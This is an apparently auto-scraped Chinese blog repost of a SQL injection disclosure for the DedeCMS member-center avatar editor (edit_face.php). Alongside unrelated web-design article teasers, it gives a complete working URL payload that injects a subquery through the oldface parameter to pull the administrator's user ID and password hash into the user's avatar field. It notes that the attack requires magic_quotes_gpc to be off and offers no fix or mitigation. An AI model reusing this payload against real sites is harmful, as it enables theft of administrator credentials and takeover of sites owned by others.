DedeCMS会员中心头像修改SQL注射漏洞

网站建设评论63

作者:c4rp3nt3r

主页:http://www.0x50sec.org

DedeCMS会员中心头像修改SQL注射0day漏洞

同样需要 magic_quotes_gpc = Off ,成功利用此漏洞可获得管理员密码

漏洞参数 oldspacelogo SQL注射

http://bt/de/member/edit_face.php?dopost=save&oldface=/de/uploads/userup/3/eee.jpg%27and%20@%60%27%60,face=%28select%20concat%28userid,0x3a,pwd%29%20from%20%60%23@__admin%60%20limit%201%29,joinip=\'1

该文章由WP-AutoPost插件自动采集发布

原文地址:http://bluereader.org/article/23968082

 
如何创建高品质移动网站?6招必学~ 网站建设

如何创建高品质移动网站?6招必学~

如今手机是人们的亲密伴侣,互联网及相关流量开始向移动端集中。虽然移动互联网已处在时代的浪潮尖上,但仍然有很多公司、站长茫然不知移动网站上那些符合用户习惯、备受用户认可的建站技巧。以下分享给大家一些高品...
怎样建设好餐厅网站 网站建设

怎样建设好餐厅网站

点击上方“蓝字”,轻松关注我们1、背景音乐有些人对音乐的热爱达到了一定程度,他们会在网站上添加背景音乐。这同样适用于酒店和餐馆的网站,在就餐区播放背景音乐是不一样的,而拥有一个有背景音乐的网站则是另一...
匿名

发表评论

匿名网友
:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: